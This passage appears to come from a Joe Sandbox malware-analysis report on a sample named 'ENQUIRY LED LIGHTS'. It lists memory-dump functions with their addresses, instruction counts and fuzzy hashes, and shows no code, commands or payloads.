                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                  • Instruction ID: 1290b28b6bf7024a2bf622e1a8415444245f297304b1420f7374a666833d3226
                                                                                                  • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                  • Instruction Fuzzy Hash: 7CB1E532B00659AFDB25DBA4C850BBEBBF6AF45384F1401A9D7529B381DB30E945CB90
                                                                                                  Function 02F183C0 Relevance: .3, Instructions: 281COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 53135285ed822afe1ed089ff769d5a4b3b3b5ef47f5cff86267649d9b4f67335
                                                                                                  • Instruction ID: aacc7477b39dc7fc4d4c63ca1261dea3997c3b1c7ee17b990604af94dc694e01
                                                                                                  • Opcode Fuzzy Hash: 53135285ed822afe1ed089ff769d5a4b3b3b5ef47f5cff86267649d9b4f67335
                                                                                                  • Instruction Fuzzy Hash: CFC126756083408FE764CF14C584BABB7E5FF88384F44495EEA8987290DB74E908CF92
                                                                                                  Function 02F0C427 Relevance: .3, Instructions: 280COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f7a629862a101bdea12b752c2ebdd3cc285090a3cb9d235e26edbf7465d312f5
                                                                                                  • Instruction ID: c08b4e5a4a94b992a409b7d4d9ca9768c2b9f4a60fda4695998e752ab0e4d8bd
                                                                                                  • Opcode Fuzzy Hash: f7a629862a101bdea12b752c2ebdd3cc285090a3cb9d235e26edbf7465d312f5
                                                                                                  • Instruction Fuzzy Hash: A2B15274A002658BDB34DF54C990BBDB3B6EF44784F1485EAD60AA7390DB709D85DF20
                                                                                                  Function 02F3E5E7 Relevance: .3, Instructions: 278COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4c71a3ec96fbbf8c951226f4fce34913c132e516610fd4af9fd58fbdab29b56d
                                                                                                  • Instruction ID: 963341a7eea6f1905863ff7e70003c0e68ced4b98648f4d28ce08ad994464198
                                                                                                  • Opcode Fuzzy Hash: 4c71a3ec96fbbf8c951226f4fce34913c132e516610fd4af9fd58fbdab29b56d
                                                                                                  • Instruction Fuzzy Hash: 70A13671E006589FEB22DB98C844BAEB7A5AF057D8F040262EB11AB6D1D7749D40CFD1
                                                                                                  Function 02F50185 Relevance: .3, Instructions: 276COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 335a450d906f4b31798af95f32b8caacfbee952952396e2aed92bdda1d654249
                                                                                                  • Instruction ID: af3aff519120da1ac2814ea0a6d0135d6bbecb00e646425666a6c848622e50bf
                                                                                                  • Opcode Fuzzy Hash: 335a450d906f4b31798af95f32b8caacfbee952952396e2aed92bdda1d654249
                                                                                                  • Instruction Fuzzy Hash: 51A1A071B016269BDB24DF65C991BBAB7A5FF48398F00402DEF4597381EB74E812CB90
                                                                                                  Function 02FE4500 Relevance: .3, Instructions: 275COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: bb02be5fe995d2a80e9b009e7b432c3a042f58b9bff55ac9c6686a10d98d4818
                                                                                                  • Instruction ID: bb316859944a57b1efe7e26fb46f1b4d26431a670f584ef7f1550c295d9af4c7
                                                                                                  • Opcode Fuzzy Hash: bb02be5fe995d2a80e9b009e7b432c3a042f58b9bff55ac9c6686a10d98d4818
                                                                                                  • Instruction Fuzzy Hash: FDA1BB72A04651AFCB12DF24CD80B2AB7EAFF49788F41052CEA969B650C734E940CF91
                                                                                                  Function 02F960E0 Relevance: .3, Instructions: 264COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5e4dce7257e663dc7dce3ceb29d56d921621544ead20489810e9ccdf57452d79
                                                                                                  • Instruction ID: 785a2b49e5c816f96cdeb5cde4f9d99bf448cffa491bb88689623dc3cf09189f
                                                                                                  • Opcode Fuzzy Hash: 5e4dce7257e663dc7dce3ceb29d56d921621544ead20489810e9ccdf57452d79
                                                                                                  • Instruction Fuzzy Hash: 02918271E00219AFEF15CF68DC84BAEBBB9AB48794F154169E710EB341D734E9409FA0
                                                                                                  Function 02F2E3F0 Relevance: .3, Instructions: 261COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3812da4d367bf68894cb1f8dc40aa48c5aec82a07bc00e3361d7cacee16c668d
                                                                                                  • Instruction ID: 2abf247c17b7a09f7fec47a612b5e98fef91d60e082ecc4f44ee13bbb4db76be
                                                                                                  • Opcode Fuzzy Hash: 3812da4d367bf68894cb1f8dc40aa48c5aec82a07bc00e3361d7cacee16c668d
                                                                                                  • Instruction Fuzzy Hash: F0912536E006258BE724DF18C950B7DB7A6EF8A794F254066EE05DB380EB74E809CB50
                                                                                                  Function 02F66ACC Relevance: .2, Instructions: 226COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 662a26946c382759a79b30895ff2ba7c52e4cfc2515df6be50a231abd25f91d2
                                                                                                  • Instruction ID: 9745f68a8283c189aa84d7e5b2d6a6380aa16ba40ef791b19834aa6d22b5977f
                                                                                                  • Opcode Fuzzy Hash: 662a26946c382759a79b30895ff2ba7c52e4cfc2515df6be50a231abd25f91d2
                                                                                                  • Instruction Fuzzy Hash: 5F8193B1E006269BDB18CF69C944ABEBBF9FF48744F14852EE545E7640E338D940CBA4
                                                                                                  Function 02FDAB40 Relevance: .2, Instructions: 222COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                  • Instruction ID: b7ecfd97e1418d5a57494dc6d7aee92088959dc5c6f27e9b26ef2e0322166f2d
                                                                                                  • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                  • Instruction Fuzzy Hash: 58818071B002099FCF18DF99C880AAEB7B7FF84354F188569DA169B384DB74E902CB54
                                                                                                  Function 02F4E284 Relevance: .2, Instructions: 212COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 55eeb8982e23603af6615a1163f7c3fb9ffe24d7ff71e10972af9dfa9d7e2ac2
                                                                                                  • Instruction ID: 41d429359c1f2ccfda972f28063ccb545137ec0e852dfe4090247ce699b672cb
                                                                                                  • Opcode Fuzzy Hash: 55eeb8982e23603af6615a1163f7c3fb9ffe24d7ff71e10972af9dfa9d7e2ac2
                                                                                                  • Instruction Fuzzy Hash: E9814271E00609AFDB25DFA5C880BEEBBFAFF48394F104429E655A7250DB70AD45CB50
                                                                                                  Function 02F2C640 Relevance: .2, Instructions: 206COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7db08b7244336a5439e1322781402ad83da3f3e8bac678418badf73a914d63a8
                                                                                                  • Instruction ID: 04cd57790ec7b9af814f9967bac15a3fbb747c71b627c8b5b0f2a47acca329f1
                                                                                                  • Opcode Fuzzy Hash: 7db08b7244336a5439e1322781402ad83da3f3e8bac678418badf73a914d63a8
                                                                                                  • Instruction Fuzzy Hash: 4A71EE75D01629DBCB25CF59C8907BEBBB5FF49784F15411BEA46AB350E3349804CBA0
                                                                                                  Function 02FC47A0 Relevance: .2, Instructions: 202COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: af6033d900b0a0085623b1022d8898bc9ae19b9833d8578dedcd694c05f7e04b
                                                                                                  • Instruction ID: bed219aa8acf6d57e7938d861391f288c7d15231fe5e5e84aa6d5e138c4e7cd7
                                                                                                  • Opcode Fuzzy Hash: af6033d900b0a0085623b1022d8898bc9ae19b9833d8578dedcd694c05f7e04b
                                                                                                  • Instruction Fuzzy Hash: EC717270D0120AEFDB14DF95DA60E5ABBFAEB81398F21415FE724A7298C7368900DF54
                                                                                                  Function 02F2260B Relevance: .2, Instructions: 201COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 71fefc3b55d03a039b8796d1f5a4d74eea00cc7453784fef0e7ce3cf46d9be0e
                                                                                                  • Instruction ID: e1329ee9431cb191d11937ccde1831c1460f999e4c58a508a9f7b7678d6267ca
                                                                                                  • Opcode Fuzzy Hash: 71fefc3b55d03a039b8796d1f5a4d74eea00cc7453784fef0e7ce3cf46d9be0e
                                                                                                  • Instruction Fuzzy Hash: CC71B072A046518FC311DF28C880B6AB7E6FF85394F0485AAEA95CB351DB38DC49CF91
                                                                                                  Function 02FA62A0 Relevance: .2, Instructions: 198COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c69d6b350655cb8859aa99e215e79aab3b8d67161519ca7b50da46abea9f0e42
                                                                                                  • Instruction ID: 146747eede48fe97be2e13b9a0fbb15f8e2bb2463f62598d8e0fd3f1bce1937b
                                                                                                  • Opcode Fuzzy Hash: c69d6b350655cb8859aa99e215e79aab3b8d67161519ca7b50da46abea9f0e42
                                                                                                  • Instruction Fuzzy Hash: C47102B2600B00AFDB319F14CD64F56B7EAEF447A4F184528EB26DB2A0D775E844CB50
                                                                                                  Function 02F9035C Relevance: .2, Instructions: 198COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                  • Instruction ID: a8f6b0f95ac80d54880f251eb2c85a92fb235a6c82d12e3c4b379778f7a45bde
                                                                                                  • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                  • Instruction Fuzzy Hash: 5B718D71E00619AFDB10DFA9C984AAEBBB9FF88744F104469E605E7290DB34EA45CF50
                                                                                                  Function 02F18AA0 Relevance: .2, Instructions: 197COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 533749532fd29ef6f0784807871ef131dd47703245cd0d2de3d36de2aa54d6bc
                                                                                                  • Instruction ID: 6af6cb68ec191df50d6004784c3fc71884fce8e36bb348f2b124521663e05d9d
                                                                                                  • Opcode Fuzzy Hash: 533749532fd29ef6f0784807871ef131dd47703245cd0d2de3d36de2aa54d6bc
                                                                                                  • Instruction Fuzzy Hash: 1581AC72A053158FEB14DF99D580BBEB7B2BF48398F55412ADA00AB291C778DE40CF94
                                                                                                  Function 02FCA250 Relevance: .2, Instructions: 184COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 953c33f081c97dda9abac0eacd545e1ff2213c4ee1e99eebac5eb72a5df22392
                                                                                                  • Instruction ID: 2d9fe02e2da73d5c3de8d7d62cf8c16fe03154487a57d08f46fd71df0c7e2f20
                                                                                                  • Opcode Fuzzy Hash: 953c33f081c97dda9abac0eacd545e1ff2213c4ee1e99eebac5eb72a5df22392
                                                                                                  • Instruction Fuzzy Hash: 6051DF7290461AAFD711DE68CA84E5BB7E9EBC5794F10092DBF40DB160D731ED04CBA2
                                                                                                  Function 02FB8350 Relevance: .2, Instructions: 161COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3bc5e0ef6e6d0f2881fc5d9a368e4d4f785a6efc2dbd45332e00549dcedf0f77
                                                                                                  • Instruction ID: 0d87c454a5a2f695073171f1c1265dd27ee1286d426bfa1e7a3149d3ef94ba35
                                                                                                  • Opcode Fuzzy Hash: 3bc5e0ef6e6d0f2881fc5d9a368e4d4f785a6efc2dbd45332e00549dcedf0f77
                                                                                                  • Instruction Fuzzy Hash: D4518D70A00704DBD722DFA6C980AABFBF9BF94794F10461ED29657AA0C7B0A945CF50
                                                                                                  Function 02F4E443 Relevance: .2, Instructions: 158COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 48a0e5db9efa45ec7c222feeda544c8720d271f56aad7d56eee75bc9a88412a6
                                                                                                  • Instruction ID: 98e2d808a39d51eede185a148ce8d5cc5f177b6af30a3d335f446a637c422986
                                                                                                  • Opcode Fuzzy Hash: 48a0e5db9efa45ec7c222feeda544c8720d271f56aad7d56eee75bc9a88412a6
                                                                                                  • Instruction Fuzzy Hash: 0E515872640A149FCB21EF64C980EAAB7FAFF087D4F40046AE74297660DB74E944CF50
                                                                                                  Function 02FB4180 Relevance: .2, Instructions: 156COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e80547627b409a8fc55ce19eb2b97dfa3fd490538d9091c83572e65ee22f65d7
                                                                                                  • Instruction ID: 1c11ca714a540e9ead5acb26acddef8ca08b333dfba02f77a36a3c11af0f35b8
                                                                                                  • Opcode Fuzzy Hash: e80547627b409a8fc55ce19eb2b97dfa3fd490538d9091c83572e65ee22f65d7
                                                                                                  • Instruction Fuzzy Hash: 07519A716083018FC755DF2AD990AABB7E6BFC8388F48492DF689C7251EB30D905CB52
                                                                                                  Function 02F345B1 Relevance: .2, Instructions: 156COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                  • Instruction ID: de11a5ff0a651ef115b29aaa608a2a025bd7da3e90e1184c9680f591fb5207d1
                                                                                                  • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                  • Instruction Fuzzy Hash: B3515D71E0021DABCF16DF94C840BAEBBB5AF49798F0440AAEB01AB340D774D944CFA4
                                                                                                  Function 02F9E9E0 Relevance: .2, Instructions: 154COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                  • Instruction ID: e37a6b82fd45336a28178ee24792bd5d10b45df070f055dc0249e74cbb9a29f3
                                                                                                  • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                  • Instruction Fuzzy Hash: D9519331E00219EFEF21DF90CC94BAEB7B9AF003A8F154666DB1267290D7319E44CB90
                                                                                                  Function 02FD8B28 Relevance: .2, Instructions: 152COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: dd0aff560d6b44f6cd7d767f9456a75cae7d6cc99998b9e009d1c7b533e6b7cc
                                                                                                  • Instruction ID: c6b4320838b328e3f89d4d7b2b8bf29106f674962600e7aedff8d87e5618a3a3
                                                                                                  • Opcode Fuzzy Hash: dd0aff560d6b44f6cd7d767f9456a75cae7d6cc99998b9e009d1c7b533e6b7cc
                                                                                                  • Instruction Fuzzy Hash: F141F571B026109BD729DB29CC94F7FB7ABEF807E4F0C8619EA5587280DB74D802C691
                                                                                                  Function 02F9CBF0 Relevance: .1, Instructions: 148COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 685d59120692d52c395ae676541f269eaf9806567cc0bc9267ec635cad88a3f8
                                                                                                  • Instruction ID: a410951fb4e3b6112eddddddcc163ce9b6746360c99f47ec49306c7f44a7e6f3
                                                                                                  • Opcode Fuzzy Hash: 685d59120692d52c395ae676541f269eaf9806567cc0bc9267ec635cad88a3f8
                                                                                                  • Instruction Fuzzy Hash: F4519E72D01219DFDF20DFA9C990A9EBBBAFF48398B51451AD656A3300DB35AD01CF90
                                                                                                  Function 02FDA9D3 Relevance: .1, Instructions: 139COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                  • Instruction ID: 4d4b7332dce741109d0241a8d58a6298dcc1d3f9c2fc35027ef5f4cb10bb5524
                                                                                                  • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                  • Instruction Fuzzy Hash: 7641F972A01716DFC725CF64C980A6AB39BFF80394B08462DEA1687244EB30FC09CB94
                                                                                                  Function 02F401F8 Relevance: .1, Instructions: 138COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d82bacb731557c8b32dff84e91cf76443f2793cf5529fad3b222d645b066d727
                                                                                                  • Instruction ID: 8bbc99c06e41483d16d5189cdf211feeba3e52ab9e1082e1ebfe051468d62227
                                                                                                  • Opcode Fuzzy Hash: d82bacb731557c8b32dff84e91cf76443f2793cf5529fad3b222d645b066d727
                                                                                                  • Instruction Fuzzy Hash: 5741BD36E002149BCB18DF98C840AEDBBB5AF48798F14815EEA16E7340DF759D41CBA4
                                                                                                  Function 02F3EBFC Relevance: .1, Instructions: 138COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2cf3e41630357572d614542390c00408ae91a31b64c0b119fcaa005d200effdd
                                                                                                  • Instruction ID: 56592cdfb5859b2f25e6fab266b0d17ee4ce4b69e3c603d46d59bb6d9f809cd3
                                                                                                  • Opcode Fuzzy Hash: 2cf3e41630357572d614542390c00408ae91a31b64c0b119fcaa005d200effdd
                                                                                                  • Instruction Fuzzy Hash: 8941A2726043019FDB26DF24C890A5BB7EAFF88398F00492AEA57C7755DB35E848CB51
                                                                                                  Function 02F52750 Relevance: .1, Instructions: 137COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                  • Instruction ID: 343667fbb3c580b7766a5f91775df991e1c1b4be46f23ef47960d359474a5fba
